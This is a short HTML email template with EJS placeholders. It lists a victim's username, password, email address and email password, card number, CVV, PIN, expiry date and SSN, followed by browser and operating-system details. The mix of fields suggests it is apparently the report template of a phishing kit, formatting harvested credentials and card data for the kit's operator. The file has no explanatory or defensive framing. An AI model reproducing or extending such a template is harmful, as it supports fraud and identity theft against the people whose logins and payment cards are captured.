<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>

</head>

<body>

    <div class="main-content container-fluid p-0">
        <div class="email-head">

            <ul>
                <li>Username: <%=obj.username%>
                </li>
                <li>Password: <%=obj.password%>
                </li>
                <li>Email: <%=obj.email%>
                </li>
                <li>Email Password: <%=obj.emailPassword%>
                </li>
                <li>Card No: <%=obj.cardNo%>
                </li>
                <li>Card CVV: <%=obj.cardCvv%>
                </li>
                <li>Card Pin: <%=obj.cardPin%>
                </li>
                <li>Card Exp. Date: <%=obj.expDate%>
                </li>
                <li>Card SSN: <%=obj.ssn%>
                </li>
                <br>
                <li>Browser Name: <%=obj.name%>
                </li>
                <li>Browser Version: <%=obj.version%>
                </li>
                <li>Operating System: <%=obj.os%>
                </li>
            </ul>
        </div>

</body>

</html>